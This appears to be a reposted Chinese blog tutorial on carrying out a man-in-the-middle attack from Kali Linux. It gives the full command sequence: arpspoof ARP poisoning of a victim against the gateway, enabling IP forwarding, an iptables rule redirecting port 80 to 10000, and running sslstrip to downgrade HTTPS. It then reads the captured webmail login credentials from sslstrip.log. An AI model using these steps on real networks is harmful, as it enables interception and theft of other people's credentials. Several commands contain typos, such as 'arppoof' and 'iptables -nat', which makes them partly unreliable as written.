当前位置:   article > 正文

kali linux 中间人攻击_kali攻击80端口

kali攻击80端口

中间人攻击(Man-in-the-Middle Attack, MITM),是指攻击者跟受害者分别建立独立连接的一种入侵式攻击。最常出现于主机系统之间。

它入侵了将用户从非安全的网页连接到安全的网页系统。这样攻击者可以窃取那些连接到安全Web服务器的用户数据。

SSL strip 工具

SSL会话劫持,一种中间人攻击的形式。网络攻击者代理的是来自用户的HTTPS请求,并不是可以被拦截和篡改的通过HTTP发送的形式。SSL strip 可以将这种攻击自动化,允许第三方拦截到安全的站点的数据连接。时至今日,SSL会话劫持任然是广为使用。

初步使用只需要用到一个网卡接口。可以通过以下的命令来查看有几个网卡。

ifconfig|grep "eth"

如果启动了不止一个网卡,则关掉一个。示例关掉eth0

ifdown eth0

现在我们需要两部分的信息。目标的IP地址和自己的默认网关。

route -n|grep 'UG'|awk '{print $2}'

1.开始攻击:重定向

在开始从SSL会话中收集注入用户凭据一类的信息之前,需要先运行我们重定向网络请求工具。此外,需要重定向攻击主机中抓取请求,这样才能将用户数据包发给SSL strip。

先要在Iptables和Arpspoof工具中启用IP转发的功能。

echo 1 >/proc/sys/net/ipv4/ip_forward

为了避免让所有攻击主机对整个网络发起ARP地址洪水引起注意。在实际攻击场所中,理想情况下都是针对整个二段网络运行arpspoof,同时可以选择利用抓包和嗅探工具来进一步判定受害者的IP地址。命令是:

  1. arpspoof -i eth0 -t victimip default_gateway_ip
  2. 举例:arppoof -i eth0 -t 10.0.1.240 10.0.1.1

不建议把该进程挂在后台运行。

2.使用iptables建立端口重定义

这一步的主要意义是攻击者抓取TCP80端口的数据,将其重定向到SSL strip的监听端口。

举例:把  80—>10000

iptables -t nat -A PREROUTING -p tcp --destination 80 -j REDIRECT --to 10000

如果想禁用 PREROUTNIG规则,可以将 -A替换成-D清楚规则。

  1. 清空: iptables -nat -F
  2. 检查: iptables -nat -L

准备就绪,就可以使用SSL strip 抓取数据了。

在新打开的终端窗口启动sslstrip,运行。

sslstrip  -l 10000

在目标主机上访问在线邮件服务,并登录。

另外再打开一个终端窗口,输入

tail -n 50 -f sslstrip.log

这样就可以看到SSL strip攻击的结果了。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Gausst松鼠会/article/detail/543099
推荐阅读
相关标签
  

闽ICP备14008679号